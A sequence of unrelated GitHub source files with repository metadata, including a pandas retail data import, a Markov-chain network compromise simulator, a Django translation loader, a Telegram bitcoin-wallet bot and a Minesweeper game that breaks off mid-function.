chemin = "C:/python/prenom.txt" chemin_clean = "C:/python/prenom_clean_correction.txt" with open(chemin, "r") as f: lines = f.read().splitlines() prenoms = [] for line in lines: prenoms.extend(line.split()) prenoms_final = [prenom.strip(",. ") for prenom in prenoms] with open(chemin_clean, "w") as f: f.write("\n".join(sorted(prenoms_final)))
yunus-gdk/python_beginner
trier_liste_noms_correction.py
trier_liste_noms_correction.py
py
360
python
en
code
0
github-code
36
40751695822
import pandas as pd import glob import numpy as np import os col_names = ['date','shop','item', 'unit', 'value'] month ='02' files = [] list_of_files = glob.glob(r'\\lhrnetapp03cifs.enterprisenet.org\rfeprodapp05\InputBackupFiles\CH\Import_M\Monthly-2019-M' r'M-0{month}\*'.format(month=month)) latest_file = max(list_of_files, key=os.path.getctime) print(latest_file) # latest_files.append(latest_file) for file in glob.glob(latest_file+r'\IMPO_RA32*'.format(month=month)): print(file) df = pd.read_csv(file, header=None, sep=';') # print(df.info()) files.append(df) if len(files) >1: full = pd.concat(files) dates = full.date.unique() else: full = files[0] # quit() full[11] = full[11].apply(lambda x: pd.to_numeric(x, errors='coerce')) full[10] = full[10].astype(float) # Q=0 OR (Q<0 AND V>0) OR (Q>0 AND V<0) print(full.info()) full=full[full[10] != 0] full=full[~((full[10] > 0)&(full[11] < 0))] full=full[~((full[10] <0)&(full[11] > 0))] # ujemne=full[~((full.unit >0)&(full.value > 0))] # full = full.groupby(['date','shop','item']).aggregate({'unit':np.sum, 'value':np.sum}) full=full[full[10] >0] print(full[11].sum())
owojtek18/CH_retailers
Import_ch.py
Import_ch.py
py
1,193
python
en
code
0
github-code
36
39687720281
import networkx as nx, matplotlib.pyplot as plt, numpy as np, copy import MarkovChain as SMC from Randomized import * from time import time Pps = 0.4 # float(input('Ingrese la probabilidad de que un dispositivo protegido pase a ser susceptible: ')) Psp = 0.3 # float(input('Ingrese la probabilidad de que un dispositivo susceptible pase a ser protegido: ')) Psc = 0.5 # float(input('Ingrese la probabilidad de que un dispositivo susceptible pase a ser comprometido: ')) Pcp = 0.2 # float(input('Ingrese la probabilidad de que un dispositivo comprometido pase a ser protegido: ')) Pci = 0.1 # float(input('Ingrese la probabilidad de que un dispositivo comprometido pase a ser irrecuperable: ')) prec = 5 # int(input('Ingrese el número de decimales a manejar: ')) t_lim = 100 # int(input('Ingrese el número máximo de momentos a estudiar: ')) base_MT = [[1 - Pps, Pps, 0, 0], [Psp, 1 - Psp - Psc, Psc, 0], [Pcp, 0, 1 - Pcp - Pci, Pci], [0, 0, 0, 1]] NetGraph, NetDevices, states = None, {}, ['Protegido', 'Susceptible', 'Comprometido', 'Irrecuperable'] HeatMap, gen_distr, N = [], [], 0 def setNonDefaults(Probs): (Pps, Psp, Psc, Pcp, Pci) = Probs base_MT = [[1 - Pps, Pps, 0, 0], [Psp, 1 - Psp - Psc, Psc, 0], [Pcp, 0, 1 - Pcp - Pci, Pci], [0, 0, 0, 1]] return Psp, Psc, base_MT def createNode(i, fs, nset, MT, adjust): vi = [0, 0, 0, 0] vi[states.index(fs)] = 1 if adjust: NetDevices[i]['factual_state'] = fs NetDevices[i]['init_vector'] = np.array(vi) NetDevices[i]['trans_matrix'] = copy.deepcopy(np.array(MT)) for n in nset: if (n not in NetDevices) or (i not in NetDevices[n]['neighbors']) and (len(NetDevices[n]['neighbors']) < 4): NetDevices[i]['neighbors'].append(n) NetDevices[n]['neighbors'].append(i) else: NetDevices[i] = { 'factual_state': fs, 'init_vector': np.array(vi), 'trans_matrix': copy.deepcopy(np.array(MT)), 'neighbors': nset } def setNeighborFactor(u, NetDevices, Psp, Psc): nset, count = NetDevices[u]['neighbors'], 0 if len(nset) == 0: NetDevices[u]['trans_matrix'][1][1] = 1 - Psp - Psc NetDevices[u]['trans_matrix'][1][2] = Psc else: for n in nset: if NetDevices[n]['factual_state'] in states[2:]: count += 1 factor = (Psc + (count / len(nset))) / 2 NetDevices[u]['trans_matrix'][1][1] = np.round_(1 - Psp - factor, prec) NetDevices[u]['trans_matrix'][1][2] = np.round_(factor, prec) def setFactualState(j, NetDevices): ref = states.index(NetDevices[j]['factual_state']) comp = np.argmax(NetDevices[j]['init_vector']) if NetDevices[j]['trans_matrix'][ref][comp] == 0: if ref == 3: comp = ref elif ref == 2 and comp == 1: if NetDevices[j]['init_vector'][0] == 0: comp = 3 else: comp = 0 elif NetDevices[j]['init_vector'][ref + 1] == 0: comp = 0 else: comp = ref + 1 return states[comp] def manualBuildNetwork(N, MT): base_MT = MT; edges = [] nodes = [(x+1) for x in range(N)] for y in nodes: fs = '' while fs not in states: fs = input('Ingrese el estado del nodo '+str(y)+' (Protegido, Susceptible, Comprometido o Irrecuperable): ') n_chain = input('Ingrese los vecinos del nodo ' + str(y) + ' separados por comas: ').split(',') neighbors = [int(n) for n in n_chain] createNode(y, fs, neighbors, base_MT, False) for n in neighbors: edges.append([y, n]) return graphNetwork(nodes, edges) def UIBuildNetwork(Nstates, Nedges, MT): nodes, edges = [(x+1) for x in range(len(Nedges))], [] for y in nodes: fs = Nstates[y-1] n_chain = Nedges[y-1].split(',') neighbors = [int(n) for n in n_chain] createNode(y, fs, neighbors, MT, False) for n in neighbors: edges.append([y, n]) return nodes, edges, NetDevices def autoBuildNetwork(N, topology, MT): base_MT = MT; edges, adjust = [], False nodes = [(x+1) for x in range(N)] for y in nodes: fs, neighbors = randomFactualState(states), [] if y == 1: for x in range(N): NetDevices[x + 1] = {'factual_state': '', 'init_vector': [], 'trans_matrix': [], 'neighbors': []} if topology == 'Lineal': if y < N: neighbors.append(y + 1) if y > 1: neighbors.append(y - 1) elif topology == 'Anillo': if y < N: neighbors.append(y + 1) if y > 1: neighbors.append(y - 1) if y in (1, N): neighbors.append(N - y + 1) elif topology == 'Estrella': if y == 1: neighbors = range(2, N + 1) else: neighbors = [1] elif topology == 'Cuadricula': if y < N: neighbors.append(y + 1) if y > 1: neighbors.append(y - 1) if y % 2 == 0 and y in range(3, 10): neighbors.append(1) if y in (2, 9) and N >= 9: neighbors.append(11 - y) if y == 1: neighbors.extend(range(4, np.min([N+1, 8]), 2)) elif topology == 'Malla': prev = len(NetDevices[y]['neighbors']) limnodes = np.min([N, 5-prev]) if limnodes > 1: tries, checks, adjust = np.random.randint(1, limnodes), 0, True while checks < tries: randneighbor = np.random.randint(1, N+1) if y != randneighbor and randneighbor not in neighbors: neighbors.append(randneighbor) checks += 1 createNode(y, fs, neighbors, MT, adjust) for n in neighbors: edges.append([y, n]) #graphNetwork(nodes, edges) return NetDevices def graphNetwork(nodes, edges): NetGraph = nx.Graph() NetGraph.add_nodes_from(nodes) nx.set_node_attributes(NetGraph, NetDevices) NetGraph.add_edges_from(edges) MC = plt.figure(figsize=(8, 6)) pos = nx.kamada_kawai_layout(NetGraph) nx.draw_networkx_nodes(NetGraph, pos, cmap=plt.get_cmap('jet'), node_size=1250, node_color='cyan') nx.draw_networkx_labels(NetGraph, pos) nx.draw_networkx_edges(NetGraph, pos) plt.show() return MC def scanDistribution(N, NetDevices): sums = np.array([0, 0, 0, 0]) for z in range(N): sums[states.index(NetDevices[z + 1]['factual_state'])] += 1 sums = sums / N return sums def spotNodeStates(N, NetDevices): nodestates = np.array([0]*N) for z in range(N): nodestates[z] = states.index(NetDevices[z + 1]['factual_state']) return nodestates def performStepAllNodes(N, NetDevices, Psp, Psc): report, statereg = '', '' #print('Distribution: ' + str(scanDistribution(N))) for a in range(1, N + 1): #report += str(NetDevices[a]['init_vector']) + ' ' #statereg += str(NetDevices[a]['factual_state']) + ' ' setNeighborFactor(a, NetDevices, Psp, Psc) #print(NetDevices[a]['init_vector'], NetDevices[a]['trans_matrix']) step = np.matmul(NetDevices[a]['init_vector'], NetDevices[a]['trans_matrix']) NetDevices[a]['init_vector'] = np.around(step, prec) NetDevices[a]['factual_state'] = setFactualState(a, NetDevices) #print(report + '\n', statereg) return scanDistribution(N, NetDevices) def paintProgressMC(progress): BP = plt.figure() plt.xlabel('Time (t)') plt.ylabel('Probability (P)') for p in progress: plt.plot(p) plt.legend(states) plt.show() return BP def getPlots(progress, temps, comparetemps, context): plt.plot(progress) plt.title('Pps = {0}, Psp = {1}, Psc = {2}, Pcp = {3}, Pci = {4} \nInitialization Vector = {5}' .format(Pps, Psp, Psc, Pcp, Pci, context)) plt.legend(states) plt.xlabel('Time (t)') plt.ylabel('Probability (P)') plt.show() difftemps = list(map(list, zip(temps, comparetemps))) plt.plot(difftemps) plt.title('Comparación de tiempos de ejecución conforme avanza el algoritmo') plt.legend(['Múltiple', 'Simple']) plt.xlabel('Moment (t)') plt.ylabel('Execution Time (ms)') plt.show() def retrieveHeatMap(infection, nodes, moments): HMNS = plt.figure() plt.xlabel('Time (t)') plt.ylabel('Nodes') plt.imshow(infection, cmap='hot_r', aspect='auto', extent=[1, nodes, moments, 0]) plt.show() infection = [] return HMNS def start(): N = int(input('Ingrese el número de nodos de la red: ')) NetGraph = manualBuildNetwork(N, base_MT) input('Press Enter to continue...') num_nodes = len(NetGraph.nodes) context = scanDistribution(num_nodes) progress, temps, c, executime = [context], [0], 0, 0 while c < t_lim: start_time = time() progress.append(performStepAllNodes(num_nodes, NetDevices, Psp, Psc)) total_time = time() - start_time executime += (total_time*1000); c += 1 temps.append(executime) comparetemps = SMC.start(N) getPlots(progress, temps, comparetemps, context) #paintProgressMC() retrieveHeatMap(HeatMap, len(HeatMap), len(HeatMap[0])) #means = getMeanTime(matriz_transicion, vector_inverso) #for m in range(len(means)): print('Tiempo medio desde el estado', Estados[m]+': ', means[m]) if __name__ == '__main__': start()
Zharet-Bautista-Montes/Markov_Inspector
venv/core/MultipleMC.py
MultipleMC.py
py
9,302
python
en
code
0
github-code
36
18935365420
# pylint: disable=too-many-locals, duplicate-code """Management command that loads locale .po files into database.""" from __future__ import unicode_literals import json from os.path import join, isdir from django.conf import settings from django.core.management.base import BaseCommand as LoadCommand, CommandError from django.apps import apps from babel.messages.pofile import read_po def setattr_by_json_path(json_object, path, value): """Recursive function that sets a string value given a JSON xpath.""" first_id = path.find("#") second_id = path.find("#", first_id + 1) first_key = path.find("/") second_key = path.find("/", first_key + 1) indices = [x for x in [first_id, second_id, first_key, second_key] if x > 0] indices.sort() indices.append(len(path) + 1) if path[0] == "#" and isinstance(json_object, list): child_id = path[1:indices[0]] path_remainder = path[indices[0]:] for sub_object in json_object: try: if sub_object["id"] == child_id: setattr_by_json_path(sub_object, path_remainder, value) except KeyError: pass elif path[0] == "/" and isinstance(json_object, dict): child_key = path[1:indices[0]] path_remainder = path[indices[0]:] try: sub_object = json_object[child_key] if isinstance(sub_object, str): json_object[child_key] = value else: setattr_by_json_path(sub_object, path_remainder, value) except KeyError: pass return json_object class Command(LoadCommand): """Management command that loads locale .po files into database.""" def handle(self, *args, **options): """Handle the load_trans command.""" po_filename = "nav.po" locale_path = settings.MODELTRANSLATION_LOCALE_PATH if not isdir(locale_path): raise CommandError("Locale directory does not exists.") for lang in [lang_tup[0] for lang_tup in list(settings.LANGUAGES)]: if lang != "en": lang_path = join(locale_path, lang) if not isdir(lang_path): raise CommandError("Language directory does not exists.") po_file = open(join(lang_path, "LC_MESSAGES", po_filename), "r", encoding="utf-8") catalog = read_po(po_file) po_file.close() for message in catalog: if message.string not in [None, "None", ""] and message.auto_comments: for field_id in message.auto_comments: [app, class_name, primary_key, field, json_path] = field_id.split('.') model = apps.get_model(app, class_name) try: obj = model.objects.get(pk=primary_key) except model.DoesNotExist: continue if json_path == "": setattr(obj, field, message.string) obj.save() else: msg_data = getattr(obj, field).raw_data tr_json_path = "%s_%s" % (json_path[:-3], lang) msg_data = setattr_by_json_path(msg_data, tr_json_path, message.string) setattr(obj, field, json.dumps(msg_data)) obj.save()
IATI/IATI-Standard-Website
modeltranslation_sync/management/commands/load_trans_nav.py
load_trans_nav.py
py
3,582
python
en
code
5
github-code
36
11622358382
def factorial(n: int) -> int: """Return the factorial of n, an exact integer >= 0. Args: n (int): n! Returns: int. The factorial value:: >>> factorial(5) 120 >>> factorial(0) 1 >>> factorial(-1) Traceback (most recent call last): ... ValueError: Only non-negative inputs are expected """ assert isinstance(n, int) if n < 0: raise ValueError("Only non-negative inputs are expected") if n == 0: return 1 return n * factorial(n - 1) # -------------------------------------------------------------------- if __name__ == "__main__": import doctest doctest.testmod()
UiO-IN3110/UiO-IN3110.github.io
lectures/python/factorial_doctest_exceptions.py
factorial_doctest_exceptions.py
py
678
python
en
code
21
github-code
36
25971972492
number=5 if type(number) == int: print("resultado: ",number*2) else: print("El dato no es numerico") def mensaje (men): print(men) mensaje("Mi primer Programa") mensaje("Miu segundo Programa")
PovedaJose/EjerciciosDePython
Practicas#1/Ejercicio#1.py
Ejercicio#1.py
py
216
python
es
code
1
github-code
36
17169329371
import os import telebot from dotenv import load_dotenv import client load_dotenv() bot_token = os.getenv('BOT_TOKEN') admin = os.getenv('TG_ADMIN_ID') bot = telebot.TeleBot(bot_token) states_list = ["ADDRESS", "AMOUNT", "CONFIRM"] states_of_users = {} @bot.message_handler(commands=['start']) def start_message(message): """ markup: создаем объект для работы с кнопками (row_width - определяет количество кнопок по ширине) создаем три кнопки, типа:KeyboardButton отправляем пользователю три кнопки типа:KeyboardButton после команды /start. """ try: client.create_user({"tg_ID": message.from_user.id, "nick": message.from_user.username}) except Exception as e: return e markup = telebot.types.ReplyKeyboardMarkup( row_width=3, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Кошелек') btn2 = telebot.types.KeyboardButton('Перевести') btn3 = telebot.types.KeyboardButton('История') btn4 = telebot.types.KeyboardButton('Админ') markup.add(btn1, btn2, btn3, btn4) text: str = f'Привет {message.from_user.full_name}, я твой бот-криптокошелек, \n' \ 'у меня ты можешь хранить и отправлять биткоины' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='Кошелек') def wallet(message): wallet = client.get_user_wallet_by_tg_id(message.from_user.id) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = (f'Ваш баланс: {wallet["balance"]} BTC \n' f'Ваш адрес: {wallet["address"]}') bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='История транзакций') def history(message): transactions = client.get_user_transactions( client.get_user_by_tg_id(message.from_user.id)["id"]) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Ваши транзакции: \n{transactions}' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='Перевести') def transaction(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Введите адрес кошелька куда хотите перевести: ' bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться следующее # сообщение states_of_users[message.from_user.id] = {"STATE": "ADDRESS"} @bot.message_handler(regexp='История') def history(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) transactions = ['1', '2', '3'] # сюда мы загрузим транзакции text = f'Ваши транзакции{transactions}' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(regexp='Меню') def menu(message): markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Кошелек') btn2 = telebot.types.KeyboardButton('Перевести') btn3 = telebot.types.KeyboardButton('История') markup.add(btn1, btn2, btn3) text = f'Главное меню' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == 'Админ') def admin_panel(message): if message.from_user.id != admin: markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) bot.send_message( message.chat.id, 'У вас нет прав администратора.', reply_markup=markup) else: markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Общий баланс') btn2 = telebot.types.KeyboardButton('Все юзеры') btn3 = telebot.types.KeyboardButton('Данные по юзеру') btn4 = telebot.types.KeyboardButton('Удалить юзера') markup.add(btn1, btn2, btn3, btn4) text = f'Админ-панель' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == "Все юзеры") def show_all_users(message): text = f'Юзеры:' users = client.get_users() inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: inline_markup.add(telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f'user_{user["tg_ID"]}' )) bot.send_message(message.chat.id, text, reply_markup=inline_markup) @bot.callback_query_handler(func=lambda call: True) def callback_query(call): query_type = call.data.split('_')[0] users = client.get_users() if query_type == 'user': user_id = call.data.split('_')[1] inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: if str(user['tg_ID']) == user_id: inline_markup.add( telebot.types.InlineKeyboardButton( text="Назад", callback_data='users'), telebot.types.InlineKeyboardButton( text="Удалить юзера", callback_data=f'delete_user_{user_id}')) bot.edit_message_text( text=f'Данные по юзеру:\n' f'ID: {user["tg_ID"]}\n' f'Ник: {user.get("nick")}\n' f'Баланс: {client.get_user_balance_by_id(user["id"])}', chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup) print(f"Запрошен {user}") break if query_type == 'users': inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: inline_markup.add( telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f"user_{user['tg_ID']}")) bot.edit_message_text( text="Юзеры:", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup) # прикрепляем нашу разметку к ответному сообщению if query_type == 'delete' and call.data.split('_')[1] == 'user': user_id = int(call.data.split('_')[2]) for i, user in enumerate(users): if user['tg_ID'] == user_id: print(f'Удален Юзер: {users[i]}') client.delete_user(users.pop(i)['id']) inline_markup = telebot.types.InlineKeyboardMarkup() for user in users: inline_markup.add( telebot.types.InlineKeyboardButton( text=f'Юзер: {user["tg_ID"]}', callback_data=f"user_{user['tg_ID']}")) bot.edit_message_text( text="Юзеры:", chat_id=call.message.chat.id, message_id=call.message.message_id, reply_markup=inline_markup ) @bot.message_handler(func=lambda message: message.from_user.id == admin and message.text == "Общий баланс") def total_balance(message): total_bal = client.get_total_balance() markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') btn2 = telebot.types.KeyboardButton('Админка') markup.add(btn1, btn2) text = f'Общий баланс: {total_bal} BTC' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'AMOUNT') def get_confirmation_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True ) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) if message.text.isdigit(): text = f'Вы хотите перевести {message.text} сатоши,\n' \ f'на биткоин-адрес {states_of_users[message.from_user.id]["ADDRESS"]}: ' confirm = telebot.types.KeyboardButton('Подтверждаю') markup.add(confirm) bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться # следующее сообщение states_of_users[message.from_user.id]["STATE"] = "CONFIRM" states_of_users[message.from_user.id]["AMOUNT"] = int(message.text) else: text = f'Вы ввели не число, попробуйте заново: ' bot.send_message(message.chat.id, text, reply_markup=markup) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'CONFIRM') def get_hash_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) elif message.text == "Подтверждаю": bot.send_message( message.chat.id, f" Ваша транзакция: " + str(client.create_transaction(message.from_user.id, states_of_users[message.from_user.id]['ADDRESS'], states_of_users[message.from_user.id]['AMOUNT'])) ) del states_of_users[message.from_user.id] menu(message) @bot.message_handler( func=lambda message: states_of_users.get( message.from_user.id)["STATE"] == 'ADDRESS') def get_amount_of_transaction(message): if message.text == "Меню": del states_of_users[message.from_user.id] menu(message) markup = telebot.types.ReplyKeyboardMarkup( row_width=2, resize_keyboard=True) btn1 = telebot.types.KeyboardButton('Меню') markup.add(btn1) text = f'Введите сумму в сатоши, которую хотите перевести: ' bot.send_message(message.chat.id, text, reply_markup=markup) # тут мы даём юзеру состояние при котором ему будет возвращаться следующее # сообщение states_of_users[message.from_user.id]["STATE"] = "AMOUNT" states_of_users[message.from_user.id]["ADDRESS"] = message.text bot.infinity_polling(timeout=10)
Lexxar91/bitcoin_api_bot
tg_bot/bot.py
bot.py
py
12,039
python
ru
code
0
github-code
36
40568587585
from datetime import datetime from typing import Optional from dcs.mission import Mission from game.weather.atmosphericconditions import AtmosphericConditions from game.weather.clouds import Clouds from game.weather.conditions import Conditions from game.weather.fog import Fog from game.weather.wind import WindConditions class EnvironmentGenerator: def __init__( self, mission: Mission, conditions: Conditions, time: datetime ) -> None: self.mission = mission self.conditions = conditions self.time = time def set_atmospheric(self, atmospheric: AtmosphericConditions) -> None: self.mission.weather.qnh = atmospheric.qnh.mm_hg self.mission.weather.season_temperature = atmospheric.temperature_celsius self.mission.weather.turbulence_at_ground = int(atmospheric.turbulence_per_10cm) def set_clouds(self, clouds: Optional[Clouds]) -> None: if clouds is None: return self.mission.weather.clouds_base = clouds.base self.mission.weather.clouds_thickness = clouds.thickness self.mission.weather.clouds_density = clouds.density self.mission.weather.clouds_iprecptns = clouds.precipitation self.mission.weather.clouds_preset = clouds.preset def set_fog(self, fog: Optional[Fog]) -> None: if fog is None: return self.mission.weather.fog_visibility = int(fog.visibility.meters) self.mission.weather.fog_thickness = fog.thickness def set_wind(self, wind: WindConditions) -> None: self.mission.weather.wind_at_ground = wind.at_0m self.mission.weather.wind_at_2000 = wind.at_2000m self.mission.weather.wind_at_8000 = wind.at_8000m def generate(self) -> None: self.mission.start_time = self.time self.set_atmospheric(self.conditions.weather.atmospheric) self.set_clouds(self.conditions.weather.clouds) self.set_fog(self.conditions.weather.fog) self.set_wind(self.conditions.weather.wind)
dcs-liberation/dcs_liberation
game/missiongenerator/environmentgenerator.py
environmentgenerator.py
py
2,028
python
en
code
647
github-code
36
35378767894
#!/usr/bin/env python3 """SERVICE YET TO BE IMPLEMENTED. THIS FILE IS JUST A PLACEHOLDER.""" print("Sorry! This service has not yet been implemented\n(will you be the one to take care of it?\n --- RIGHT NOW THIS FILE IS JUST AN HANDY PLACEHOLDER ---") exit(0) #!/usr/bin/env python3 from sys import stderr, stdout, exit, argv from random import randrange from time import monotonic from multilanguage import Env, Lang, TALcolors from TALinputs import TALinput # METADATA OF THIS TAL_SERVICE: problem="problem_name" service="service_name" args_list = [ ('arg1',int), ('arg2',str), ('arg3',bool), ('lang',str), ('META_TTY',bool), ] ENV =Env(problem, service, args_list) TAc =TALcolors(ENV) LANG=Lang(ENV, TAc, lambda fstring: eval(f"f'{fstring}'")) TAc.print(LANG.opening_msg, "green") # START CODING YOUR SERVICE: gen_new_s = True for _ in range(ENV['num_questions']): pass
romeorizzi/TALight
TAL_utils/problem_maker/templates/service_server_placeholder.py
service_server_placeholder.py
py
909
python
en
code
11
github-code
36
27435754821
import os import pathlib import numpy as np import matplotlib.pyplot as plt from matplotlib.image import imsave, imread def add_noise(noise_type, image): if noise_type == "gauss": shp = image.shape mean = 0 var = 0.01 sigma = var ** 0.5 gauss = np.random.normal(mean, sigma, shp) noise = image + gauss return noise if noise_type == "uniform": k = 0.5 if image.ndim == 2: row, col = image.shape noise = np.random.rand(row, col) else: row, col, chan = image.shape noise = np.random.rand(row, col, chan) noise = image + k * (noise - 0.5) return noise if noise_type == "s&p": sh = image.shape s_vs_p = 0.5 amount = 0.05 out = np.copy(image) num_salt = np.ceil(amount * image.size * s_vs_p) coords = [np.random.randint(0, i - 1, int(num_salt)) for i in sh] out[coords] = 1 num_peper = np.ceil(amount * image.size * (1.0 - s_vs_p)) coords = [np.random.randint(0, i - 1, int(num_peper)) for i in sh] out[coords] = 0 return out if noise_type == "poisson": PEAK = 20 noisy = image + np.random.poisson(0.5 * PEAK, image.shape) / PEAK return noisy if noise_type == "speckle": if image.ndim == 2: row, col = image.shape noise = np.random.randn(row, col) else: row, col, chan = image.shape noise = np.random.randn(row, col, chan) noisy = image + image * 0.5 * noise return noisy def read_images_1(img_path): row, column = 3, 2 # Original picture fig = plt.figure(img_path) plt.axis("off") img = imread(img_path) fig.add_subplot(row, column, 1, title="Original") plt.imshow(img, cmap="gray") plt.axis("off") fig.add_subplot(row, column, 2, title="Gauss") plt.imshow(add_noise("gauss", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 3, title="Uniform") plt.imshow(add_noise("uniform", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 4, title="s&p") plt.imshow(add_noise("s&p", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 5, title="Poisson") plt.imshow(add_noise("poisson", img), cmap="gray") plt.axis("off") fig.add_subplot(row, column, 6, title="Speckle") plt.imshow(add_noise("speckle", img), cmap="gray") plt.axis("off") plt.show(block=True) if __name__ == "__main__": img_path = os.path.join(pathlib.Path(__file__).parent.parent, "input1", "coins.png") read_images_1(img_path)
206081/psio
Lab2/zad1.py
zad1.py
py
2,703
python
en
code
0
github-code
36
29138207241
from random import randint as rand import pygame import time row_max =16 column_max =16 mine_count = 50 square_list = [] square_size = 30 BLACK = (0,0,0) WHITE = (255,255,255) BLUE = (0,0,255) RED = (255,0,0) pygame.init() stage = "setup" check_list = [] screen = pygame.display.set_mode((square_size*column_max, square_size*row_max)) pygame.display.set_caption("Minesweeper") class square: def __init__(self, row, column): self.row = row self.column = column self.mine = False self.hidden = True self.flag = False self.mark_mine = False self.mark_safe = False def adjacents(self, choice): adjacent_list = [] empty_list = [] for row_difference in range(-1,2): new_row = self.row + row_difference for column_difference in range(-1,2): new_column = self.column + column_difference if (0 <= new_column < column_max) and (0 <= new_row < row_max) and not (column_difference == 0 and row_difference == 0): adjacent_list.append([self.row+row_difference, self.column + column_difference]) output_list = [] for item in adjacent_list: thing = square_list[item[0]][item[1]] output_list.append(thing) if thing.hidden and not thing.flag: empty_list.append(thing) if choice == 0: return output_list else: return empty_list def adjacent_mines(self, type): num_mines = 0 num_safe = 0 num_hidden = 0 num_flag = 0 num_blank = 0 for item in self.adjacents(0): if item.mine: num_mines += 1 else: num_safe +=1 if item.hidden: num_hidden +=1 if item.flag: num_flag +=1 else: num_blank += 1 if type == 'm': return num_mines elif type == 's': return num_safe elif type == "h": return num_hidden elif type == "f": return num_flag elif type == "b": return num_blank def draw_me(self): if self.hidden: colour = WHITE text_colour = BLACK text = "F" else: colour = BLACK text_colour = WHITE text = str(self.adjacent_mines("m")) pygame.draw.rect(screen, colour, (self.column*square_size, self.row*square_size, square_size, square_size)) if ((not self.hidden) or self.flag) and text != "0": font = pygame.font.SysFont(None, square_size) screen.blit(font.render(text, True, text_colour), (self.column *square_size + square_size/3, self.row*square_size + square_size/3)) def reveal(self): global reveal_count global stage global win global check_list if self.hidden: reveal_count += 1 self.flag = False if self.mine: stage = "end" win = False print(self.row, self.column) else: self.hidden = False check_win() if self.adjacent_mines("m") == 0: for item in self.adjacents(0): if item.hidden: item.reveal() if self.adjacent_mines("b") > 0: check_list.append(self) def autocomplete(self): worked = False if (not self.hidden) and self.adjacent_mines("b") > 0: if self.adjacent_mines("b") == self.adjacent_mines("m")-self.adjacent_mines("f"): worked = True for item in self.adjacents(1): item.flag = True elif self.adjacent_mines("m") == self.adjacent_mines("f"): worked = True for item in self.adjacents(1): item.reveal() return worked for row in range(row_max): square_list.append([]) for column in range(column_max): square_object = square(row, column) square_list[row].append(square_object) def setup(chosen_row, chosen_column): global reveal_count square_list[chosen_row][chosen_column].hidden = False reveal_count = 1 for item in square_list[chosen_row][chosen_column].adjacents(0): item.hidden = False reveal_count += 1 for _ in range(mine_count): valid = False while not valid: valid = True random_column = rand(0, column_max-1) random_row = rand(0, row_max -1) if square_list[random_row][random_column].mine or (not square_list[random_row][random_column].hidden): valid = False else: square_list[random_row][random_column].mine = True for item in square_list[random_row][random_column].adjacents(0): if item.adjacent_mines('s') == 0: valid = False square_list[random_row][random_column].mine = False break for row in square_list: for item in row: if not item.hidden: item.reveal() def draw_grid(): for i in range(row_max + 1): pygame.draw.line(screen, BLUE, (0, i*square_size), (column_max*square_size, i*square_size)) for i in range(column_max + 1): pygame.draw.line(screen, BLUE, (i*square_size, 0), (i*square_size, row_max*square_size)) def draw_board(): for row in square_list: for item in row: item.draw_me() draw_grid() def list_possibilities(num_things, num_spaces): if num_things > num_spaces: return([]) elif num_things == 0: string = "" for _ in range(num_spaces): string += "0" return([string]) else: output_list = [] position_list = [] for _ in range(num_things): position_list.append("") def recursive(ordinal, smaller): nonlocal output_list nonlocal position_list for current in range(smaller+1, num_spaces -ordinal ): position_list[ordinal] = current if ordinal == 0: placeholder = [] for item in position_list: placeholder.append(item) output_list.append(placeholder) else: recursive(ordinal - 1, current) recursive(num_things-1, -1) return output_list def wait(): draw_board() pygame.display.update() def brute(working): global check_list for square in check_list: print(square.row, square.column) wait() if working: print("going") working = False count = 0 for i in range(len(check_list)): if stage == "play": item = check_list[count] if item.adjacent_mines("b") > 0: attempt = item.autocomplete() pygame.event.get() if attempt: working = True del check_list[count] wait() check_win() else: count += 1 else: del check_list[count] else: break else: print("stuck") wait() stuck_v2() # thread = threading.Thread(stuck()) # thread.start() # thread.join() working = True check_win() return working def check_board(): valid = True for row in square_list: for item in row: if (not item.hidden) and 